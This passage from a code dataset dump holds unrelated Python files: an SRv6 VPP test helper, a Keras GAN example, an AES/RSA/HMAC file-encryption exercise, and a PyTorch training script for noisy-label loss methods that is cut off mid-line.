address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params = '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 steering policy for BindingSID {0} failed on '\n 'node {1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Delete SRv6 steering policy on the given node.\n\n :param node: Given node to delete steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n params = 'del'\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params += 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params += '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for bsid {0} failed on node {1}'.format(\n bsid, node['host']))\n\n @staticmethod\n def show_sr_steering_policies(node):\n \"\"\"Show SRv6 steering policies on the given node.\n\n :param node: Given node to show SRv6 steering policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_policies_show.vat')\n","sub_path":"resources/libraries/python/SRv6.py","file_name":"SRv6.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"400232648","text":"import tensorflow as tf\nfrom easydict import EasyDict as edict\nfrom tensorflow.python import keras\nfrom tensorflow.python.keras import layers\n\nfrom gans.callbacks import saver\nfrom gans.models import sequential\nfrom gans.trainers import optimizers\nfrom gans.trainers import vanilla_gan_trainer\n\nmodel_parameters = edict({\n 'batch_size': 256,\n 'num_epochs': 15,\n 'buffer_size': 100000,\n 'latent_size': 5,\n 'learning_rate_generator': 0.0002,\n 'learning_rate_discriminator': 0.0002,\n 'save_images_every_n_steps': 20\n})\n\n\ndef generate_samples(num_samples):\n x = tf.random.uniform(shape=[num_samples], minval=-10, maxval=10)\n y = tf.nn.sigmoid(x)\n data = tf.stack([x, y], axis=1)\n return tf.data.Dataset. \\\n from_tensor_slices(data). \\\n shuffle(model_parameters.buffer_size). \\\n batch(model_parameters.batch_size)\n\n\ndataset = generate_samples(num_samples=500000)\n\n\ndef validation_dataset():\n return tf.random.normal([model_parameters.batch_size, model_parameters.latent_size])\n\n\nvalidation_dataset = validation_dataset()\n\ngenerator = sequential.SequentialModel(\n layers=[\n keras.Input(shape=[model_parameters.latent_size]),\n layers.Dense(units=15),\n layers.ELU(),\n layers.Dense(units=10),\n layers.ELU(),\n layers.Dense(units=5),\n layers.ELU(),\n layers.Dense(units=2, activation='linear'),\n ]\n)\n\ndiscriminator = sequential.SequentialModel(\n [\n keras.Input(shape=[2]),\n layers.Dense(units=25, activation='relu'),\n layers.Dense(units=15, activation='relu'),\n layers.Dense(units=10, activation='relu'),\n layers.Dense(units=2, activation='sigmoid'),\n ]\n)\n\ngenerator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_generator,\n beta_1=0.5,\n)\ndiscriminator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_discriminator,\n beta_1=0.5,\n)\n\ncallbacks = [\n saver.FunctionProblemSaver(\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n )\n]\n\ngan_trainer = vanilla_gan_trainer.VanillaGANTrainer(\n batch_size=model_parameters.batch_size,\n generator=generator,\n discriminator=discriminator,\n training_name='VANILLA_GAN_MODEL_SIGMOID',\n generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n latent_size=model_parameters.latent_size,\n continue_training=False,\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n validation_dataset=validation_dataset,\n callbacks=callbacks,\n)\n\ngan_trainer.train(\n dataset=dataset,\n num_epochs=model_parameters.num_epochs,\n)\n","sub_path":"Experimentation/MnistGAN/gans2/examples/vanilla_gan_function_modeling_sigmoid.py","file_name":"vanilla_gan_function_modeling_sigmoid.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"398983794","text":"import os\r\nimport os.path\r\nimport base64\r\nimport json\r\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\r\nfrom cryptography.hazmat.backends import default_backend\r\nfrom cryptography.hazmat.primitives import padding as paddingPK\r\nfrom cryptography.hazmat.primitives.asymmetric import padding as paddingOA\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives import serialization\r\nfrom cryptography.hazmat.primitives import hashes, hmac\r\n\r\nbackend = default_backend()\r\n\r\ndef Myencrypt(message, key):\r\n # Check to see if the key is at least 32 bytes\r\n if(len(key) < 32):\r\n raise ValueError('The key is too short! (Must be 32 bytes in length.)')\r\n \r\n # Generate iv and initialized ciper and encryptor objects\r\n iv = os.urandom(16)\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n encryptor = cipher.encryptor()\r\n \r\n # Initialize the padder object\r\n padder = paddingPK.PKCS7(128).padder()\r\n # Techinically useless but too scared to remove\r\n byte_message = message\r\n # Adds padding to the data\r\n padded_data = padder.update(byte_message)\r\n padded_data += padder.finalize()\r\n \r\n # Encrypt the padded data\r\n ct = encryptor.update(padded_data) + encryptor.finalize()\r\n \r\n # Store the ct and iv in a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = ct\r\n temp_data['iv'] = iv\r\n \r\n return temp_data\r\n\r\n\r\ndef Mydecrypt(ciphertext, key, iv):\r\n # Initialize the cipher and decryptor objects\r\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=backend)\r\n decryptor = cipher.decryptor()\r\n \r\n # Decrypts the padded data\r\n padded_data = decryptor.update(ciphertext) + decryptor.finalize()\r\n \r\n # Initializes the unpadder object\r\n unpadder = paddingPK.PKCS7(128).unpadder()\r\n \r\n # Unpad the data\r\n data = unpadder.update(padded_data)\r\n data += unpadder.finalize()\r\n return data\r\n\r\n\r\ndef Myfileencrypt(filepath):\r\n # Generate a random key\r\n key = os.urandom(32)\r\n \r\n # Extract the filename and extension\r\n file_name = os.path.basename(filepath)\r\n extension = os.path.splitext(file_name)[1]\r\n \r\n # Check if the file is a text file or an image\r\n # Then opens the file and stores the data\r\n with open(filepath, \"rb\") as file:\r\n file_data = file.read()\r\n\r\n # Encrypt the data\r\n enc_data = Myencrypt(file_data, key)\r\n \r\n # Encode the ciphertext\r\n ct = enc_data['ct']\r\n b64_ct = base64.b64encode(ct)\r\n str_ct = b64_ct.decode(\"utf-8\") \r\n \r\n # Encode the iv\r\n iv = enc_data['iv']\r\n b64_iv = base64.b64encode(iv)\r\n str_iv = b64_iv.decode(\"utf-8\") \r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Store the data into a dictionary\r\n temp_data = {}\r\n temp_data['ct'] = str_ct\r\n temp_data['iv'] = str_iv\r\n temp_data['file_name'] = file_name\r\n temp_data['ext'] = extension\r\n temp_data['key'] = str_key\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(temp_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\n\r\n # Input is JSON filepath\r\ndef Myfiledecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = 
json.loads(json_str)\r\n \r\n # Extract the data in the dictionary\r\n key = data['key']\r\n ext = data['ext']\r\n iv = data['iv']\r\n file_name = data['file_name']\r\n \r\n # Decode the ct\r\n str_ct = data['ct']\r\n b64_ct = str_ct.encode(\"utf-8\")\r\n ct = base64.b64decode(b64_ct)\r\n \r\n # Decode the iv\r\n str_iv = data['iv']\r\n b64_iv = str_iv.encode(\"utf-8\")\r\n iv = base64.b64decode(b64_iv)\r\n \r\n # Decode the key\r\n str_key = data['key']\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Decrypt the ciphertext\r\n pt = Mydecrypt(ct, key, iv)\r\n \r\n # Check if the file is a text file or an image\r\n # Then generate a new file with the unencrypted data\r\n fh = open(file_name + \" unencrypted\" + ext, \"wb\")\r\n fh.write(pt)\r\n fh.close()\r\n \r\n return file_name + \" unencrypted\" + ext\r\n \r\ndef MyRSAEncrypt(filepath, RSA_publickey_filepath):\r\n \r\n # Encrypt the file data\r\n enc_data = Myfileencrypt(filepath)\r\n \r\n # Extract the data from the JSON\r\n with open(enc_data, \"rb\") as file:\r\n json_str = file.read()\r\n data = json.loads(json_str)\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n str_key = data['key']\r\n \r\n # Read the RSA public key from disk\r\n with open(RSA_publickey_filepath, \"rb\") as key_file:\r\n public_key = serialization.load_pem_public_key(\r\n key_file.read(),\r\n backend=default_backend()\r\n )\r\n \r\n # Decode the key\r\n b64_key = str_key.encode(\"utf-8\")\r\n key = base64.b64decode(b64_key)\r\n \r\n # Encrypt the key\r\n RSA_ct = public_key.encrypt(\r\n key,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n # Encode the ciphertext\r\n b64_RSA_ct = base64.b64encode(RSA_ct)\r\n str_RSA_ct = b64_RSA_ct.decode(\"utf-8\")\r\n \r\n # Package everything into a dictionary\r\n dict_data = {}\r\n dict_data['RSAcipher'] = str_RSA_ct\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n dict_data['ext'] = ext\r\n dict_data['file_name'] = file_name\r\n \r\n # Convert the dictionary to a JSON\r\n json_str = json.dumps(dict_data)\r\n\r\n # Write the JSON to disk\r\n fh = open(file_name + \" json.txt\", \"w\")\r\n fh.write(json_str)\r\n \r\n # Return JSON filepath\r\n return file_name + \" json.txt\"\r\n \r\ndef MyRSADecrypt(json_filepath):\r\n \r\n # Read JSON from disk\r\n with open(json_filepath, \"rb\") as file:\r\n json_str = file.read()\r\n \r\n # Convert JSON to dictionary\r\n data = json.loads(json_str)\r\n \r\n # Unpackage the dictionary\r\n str_RSA_ct = data['RSAcipher']\r\n ct = data['ct']\r\n iv = data['iv']\r\n ext = data['ext']\r\n file_name = data['file_name']\r\n \r\n # Decode the ciphertext\r\n b64_RSA_ct = str_RSA_ct.encode(\"utf-8\") \r\n RSA_ct = base64.b64decode(b64_RSA_ct)\r\n \r\n # Read the private key from disk\r\n pr_key_path = \"RSA private key.pem\"\r\n with open(pr_key_path, \"rb\") as key_file:\r\n private_key = serialization.load_pem_private_key(\r\n key_file.read(),\r\n password=None,\r\n backend=default_backend()\r\n )\r\n # Decrypt the key\r\n key = private_key.decrypt(\r\n RSA_ct,\r\n paddingOA.OAEP(\r\n mgf=paddingOA.MGF1(algorithm=hashes.SHA256()),\r\n algorithm=hashes.SHA256(),\r\n label=None\r\n )\r\n )\r\n \r\n # Encode the key\r\n b64_key = base64.b64encode(key)\r\n str_key = b64_key.decode(\"utf-8\")\r\n \r\n # Generate a new JSON to pass into Myfiledecrypt\r\n dict_data = {}\r\n dict_data['ct'] = ct\r\n dict_data['iv'] = iv\r\n 
dict_data['ext'] = ext\r\n    dict_data['file_name'] = file_name\r\n    dict_data['key'] = str_key\r\n    \r\n    json_str = json.dumps(dict_data)\r\n    \r\n    fh = open(\"new\" + file_name + \" json.txt\", \"w\")\r\n    fh.write(json_str)\r\n    \r\n    # Decrypt the file\r\n    unenc_path = Myfiledecrypt(\"new\" + file_name + \" json.txt\")\r\n    \r\n    # Return the unencrypted file's path\r\n    return unenc_path\r\n\r\n\r\ndef MyencryptMAC(message, EncKey, HMACKey):\r\n    \r\n    # Encrypt the file\r\n    json_filepath = MyRSAEncrypt(message, EncKey)\r\n    \r\n    # Read the file from disk\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    \r\n    # HMAC the file and keep the finalized tag; finalize() returns the tag bytes,\r\n    # the HMAC object itself cannot be written to a file\r\n    h = hmac.HMAC(HMACKey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    tag = h.finalize()\r\n    \r\n    # Extract the filename\r\n    file_name = os.path.basename(json_filepath)\r\n    \r\n    # Write the tag to disk (binary mode, since the tag is raw bytes)\r\n    fh = open(file_name + \" HMAC.txt\", \"wb\")\r\n    fh.write(tag)\r\n    fh.close()\r\n    \r\n    # Return the hash filepath\r\n    return file_name + \" HMAC.txt\"\r\n\r\ndef MydecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n    \r\n    # Read the stored tag from disk\r\n    with open(HMAC_filepath, \"rb\") as file:\r\n        HMAC_str = file.read()\r\n    \r\n    # Recompute the HMAC over the encrypted JSON and verify it against the stored tag\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    h.verify(HMAC_str)\r\n    \r\n    # Decrypt the file\r\n    pt_filepath = MyRSADecrypt(json_filepath)\r\n    \r\n    # Return the plaintext filepath\r\n    return pt_filepath\r\n    \r\ndef MyfileEncryptMAC(filepath, HMACkey, RSA_publickey_filepath):\r\n    \r\n    # Encrypt the file\r\n    json_filepath = MyRSAEncrypt(filepath, RSA_publickey_filepath)\r\n    \r\n    # Read the file from disk\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    \r\n    # HMAC the file and keep the finalized tag\r\n    h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    tag = h.finalize()\r\n    \r\n    # Extract the filename\r\n    file_name = os.path.basename(json_filepath)\r\n    \r\n    # Write the tag to disk (binary mode, since the tag is raw bytes)\r\n    fh = open(file_name + \" HMAC.txt\", \"wb\")\r\n    fh.write(tag)\r\n    fh.close()\r\n    \r\n    # Return the hash filepath\r\n    return file_name + \" HMAC.txt\"\r\n\r\n\r\ndef MyfileDecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n    \r\n    # Read the HMAC file from disk\r\n    with open(HMAC_filepath, \"rb\") as file:\r\n        HMAC_str = file.read()\r\n    \r\n    # Recompute the HMAC over the encrypted JSON and verify it against the stored tag\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    h.verify(HMAC_str)\r\n    \r\n    # Decrypt the file\r\n    pt_filepath = Myfiledecrypt(json_filepath)\r\n    \r\n    # Return the plaintext filepath\r\n    return pt_filepath","sub_path":"MyEncrypt/myEncrypt.py","file_name":"myEncrypt.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"511727431","text":"# original code: https://github.com/dyhan0920/PyramidNet-PyTorch/blob/master/train.py\nimport sys\nimport time \nimport argparse\nimport os\nimport shutil\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\nfrom models import resnet as RN\nfrom models import pyramidnet as PYRM\nfrom models import vgg as VGG\nfrom models import wideresnet as WR \nfrom models import shufflenetv2 as SN\nfrom models import mobilenetv2 as MN\nfrom models import resnext as RNX\nfrom models import densenet as DN\nfrom models.iccv19_resnet import *\n#from models.iccv19_resnet_ds import *\nfrom models.preactresnet import CIFAR_ResNet18, CIFAR_ResNet34 \nfrom tensorboardX import SummaryWriter\nfrom loss_all_methods import SCELoss, label_smooth, generalized_cross_entropy, joint_optimization, boot_soft, boot_hard, Forward, Backward, DisturbLabel, PC\nimport random\nimport utils\nimport numpy as np\nimport cv2\nimport warnings\nimport random\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES=True\n\nwarnings.filterwarnings(\"ignore\")\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n \n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR-10, CIFAR-100 and ImageNet-1k Training')\nparser.add_argument('--net_type', default='pyramidnet', type=str,\n help='networktype: resnet, and pyamidnet')\nparser.add_argument('-j', '--workers', default=16, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch to run')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('-b', '--batch_size', default=128, type=int,\n metavar='N', help='mini-batch size (default: 256)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=1000, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--depth', default=32, type=int,\n help='depth of the network (default: 32)')\nparser.add_argument('--no-bottleneck', dest='bottleneck', action='store_false',\n help='to use basicblock for CIFAR datasets (default: bottleneck)')\nparser.add_argument('--dataset', dest='dataset', default='imagenet', type=str,\n help='dataset (options: cifar10, cifar100, and imagenet)')\nparser.add_argument('--no-verbose', dest='verbose', action='store_false',\n help='to print the status at every iteration')\n#parser.add_argument('--alpha', default=300, type=float,\n# help='number of new channel increases per depth (default: 300)')\nparser.add_argument('--expname', default='TEST', type=str,\n help='name of experiment')\nparser.add_argument('--save_dir', default='./', type=str,\n help='model saved dir')\nparser.add_argument('--seed', type=int, default=2019, help='random 
seed')\nparser.add_argument('--resume', default=None, type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--pretrained', default='./runs/pretrained_model/resnet50-19c8e357.pth', type=str, metavar='PATH',\n\t\t\t\t\thelp='path to resnet50 pretrained pth.')\nparser.add_argument('--dali_cpu', action='store_true',\n help='Runs CPU based version of DALI pipeline.')\nparser.add_argument('--width', default=None, type=int, help='the widen factor of wideresnet')\n\nparser.add_argument(\"--local_rank\", default=0, type=int)\nparser.add_argument(\"--phase\", default=None, type=int)\n\nparser.add_argument('--theta', default=0.5, type=float)\nparser.add_argument('--method', default=None, type=str, help='ce, sce, ls, gce, jo, bootsoft, boothard, forward, backward, disturb')\nparser.add_argument('--olsalpha', default=None, type=float)\nparser.add_argument('--T', default=1.0, type=float, help='temprature to scale')\n\nparser.set_defaults(bottleneck=True)\nparser.set_defaults(verbose=True)\n\nbest_err1 = 100\nbest_err5 = 100\nnumberofclass = 1000\n\ndef main():\n global args, best_err1, best_err5, numberofclass \n args = parser.parse_args()\n \n assert args.method in ['ce', 'ols', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC'], \\\n \"method must be the one of 'ce', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC' \"\n \n args.gpu = 0\n args.world_size = 1\n \n print(args)\n log_dir = '%s/runs/record_dir/%s/' % (args.save_dir, args.expname)\n writer = SummaryWriter(log_dir=log_dir)\n \n if args.seed is not None:\n print('set the same seed for all.....')\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n\n if args.dataset.startswith('cifar'):\n normalize = transforms.Normalize(mean=[x / 255.0 for x in [125.3, 123.0, 113.9]],\n std=[x / 255.0 for x in [63.0, 62.1, 66.7]])\n\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize\n ])\n\n if args.dataset == 'cifar100':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n numberofclass = 100\n elif args.dataset == 'cifar10':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=False, num_workers=args.workers, pin_memory=False)\n numberofclass = 10\n else:\n raise Exception('unknown dataset: {}'.format(args.dataset))\n \n elif args.dataset == 'imagenet':\n traindir = os.path.join('./data/ILSVRC1/train')\n valdir = os.path.join('./data/ILSVRC1/val1')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n jittering = utils.ColorJitter(brightness=0.4, contrast=0.4,\n 
saturation=0.4)\n lighting = utils.Lighting(alphastd=0.1,\n eigval=[0.2175, 0.0188, 0.0045],\n eigvec=[[-0.5675, 0.7192, 0.4009],\n [-0.5808, -0.0045, -0.8140],\n [-0.5836, -0.6948, 0.4203]])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n jittering,\n lighting,\n normalize,\n ]))\n\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),\n num_workers=args.workers, pin_memory=False, sampler=train_sampler)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=False)\n numberofclass = 1000\n\n \n \n print(\"=> creating model '{}'\".format(args.net_type))\n # define loss function (criterion) and optimizer\n solver = Solver()\n\n solver.model = solver.model.cuda()\n print('the number of model parameters: {}'.format(sum([p.data.nelement() for p in solver.model.parameters()])))\n cudnn.benchmark = True\n\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n best_err1 = checkpoint['best_err1']\n solver.model.load_state_dict(checkpoint['state_dict'])\n solver.optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n \n \n for epoch in range(args.start_epoch, args.epochs): \n print('current os time = ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n adjust_learning_rate(solver.optimizer, epoch)\n # train for one epoch\n train_loss = solver.train(train_loader, epoch)\n # evaluate on validation set\n err1, err5, val_loss = solver.validate(val_loader, epoch)\n\n writer.add_scalar('training loss', train_loss, epoch)\n writer.add_scalar('testing loss', val_loss, epoch)\n writer.add_scalar('top1 error', err1, epoch)\n writer.add_scalar('top5 error', err5, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = err1 <= best_err1\n best_err1 = min(err1, best_err1)\n if is_best:\n best_err5 = err5\n \n print('Current best accuracy (top-1 and 5 error):', best_err1, best_err5)\n save_checkpoint({\n 'epoch': epoch,\n 'arch': args.net_type,\n 'state_dict': solver.model.state_dict(),\n 'best_err1': best_err1,\n 'best_err5': best_err5,\n 'optimizer': solver.optimizer.state_dict(),\n }, is_best)\n\n print('Best accuracy (top-1 and 5 error):', best_err1, best_err5)\n print('method = {}, expname = {}'.format(args.method, args.expname))\n loss_dir = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n writer.export_scalars_to_json(loss_dir + 'loss.json')\n writer.close()\n\nclass Solver():\n def __init__(self):\n super(Solver, self).__init__()\n global numberofclass \n \n #define the network\n if args.net_type == 'resnet':\n self.model = RN.ResNet(dataset=args.dataset, depth=args.depth, num_classes=numberofclass, bottleneck=args.bottleneck)\n \n elif args.net_type == 'pyramidnet':\n self.model = PYRM.PyramidNet(args.dataset, args.depth, args.alpha, numberofclass,\n args.bottleneck)\n \n elif args.net_type == 'wideresnet':\n self.model = WR.WideResNet(depth=args.depth, num_classes=numberofclass, widen_factor=args.width)\n 
\n elif args.net_type == 'vggnet':\n self.model = VGG.vgg16(num_classes=numberofclass)\n \n elif args.net_type == 'mobilenet':\n self.model = MN.mobile_half(num_classes=numberofclass)\n \n elif args.net_type == 'shufflenet':\n self.model = SN.ShuffleV2(num_classes=numberofclass)\n \n elif args.net_type == 'densenet':\n self.model = DN.densenet_cifar(num_classes=numberofclass)\n \n elif args.net_type == 'resnext29-2':\n self.model = RNX.ResNeXt29_2x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-4':\n self.model = RNX.ResNeXt29_4x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-32':\n self.model = RNX.ResNeXt29_32x4d(num_classes=numberofclass)\n \n elif args.net_type == 'imagenetresnet18':\n self.model = multi_resnet18_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet34':\n self.model = multi_resnet34_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet50':\n self.model = multi_resnet50_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet101':\n self.model = multi_resnet101_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet152':\n self.model = multi_resnet152_kd(num_classes=numberofclass)\n else:\n raise Exception('unknown network architecture: {}'.format(args.net_type))\n\n \n\n \n self.optimizer = torch.optim.SGD(self.model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay, nesterov=True)\n self.loss_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.loss_lams.requires_grad = False \n #define the loss function\n if args.method == 'ce':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'sce':\n if args.dataset == 'cifar10':\n self.criterion = SCELoss(alpha=0.1, beta=1.0, num_classes=numberofclass)\n else:\n self.criterion = SCELoss(alpha=6.0, beta=0.1, num_classes=numberofclass)\n elif args.method == 'ls':\n self.criterion = label_smooth(num_classes=numberofclass)\n elif args.method == 'gce':\n self.criterion = generalized_cross_entropy(num_classes=numberofclass)\n elif args.method == 'jo':\n self.criterion = joint_optimization(num_classes=numberofclass)\n elif args.method == 'bootsoft':\n self.criterion = boot_soft(num_classes=numberofclass)\n elif args.method == 'boothard':\n self.criterion = boot_hard(num_classes=numberofclass)\n elif args.method == 'forward':\n self.criterion = Forward(num_classes=numberofclass)\n elif args.method == 'backward':\n self.criterion = Backward(num_classes=numberofclass)\n elif args.method == 'disturb':\n self.criterion = DisturbLabel(num_classes=numberofclass)\n elif args.method == 'ols':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'PC':\n self.criterion = PC(100)\n self.criterion = self.criterion.cuda()\n \n\n def update_loss_lams(self, output, target):\n with torch.no_grad():\n logits = torch.softmax(output, dim=1)\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n def update_loss_lams2(self, output, target):\n with torch.no_grad():\n logits = output / args.T\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n \n \n def soft_cross_entropy(self, output, target): \n target_prob = torch.zeros_like(output)\n batch 
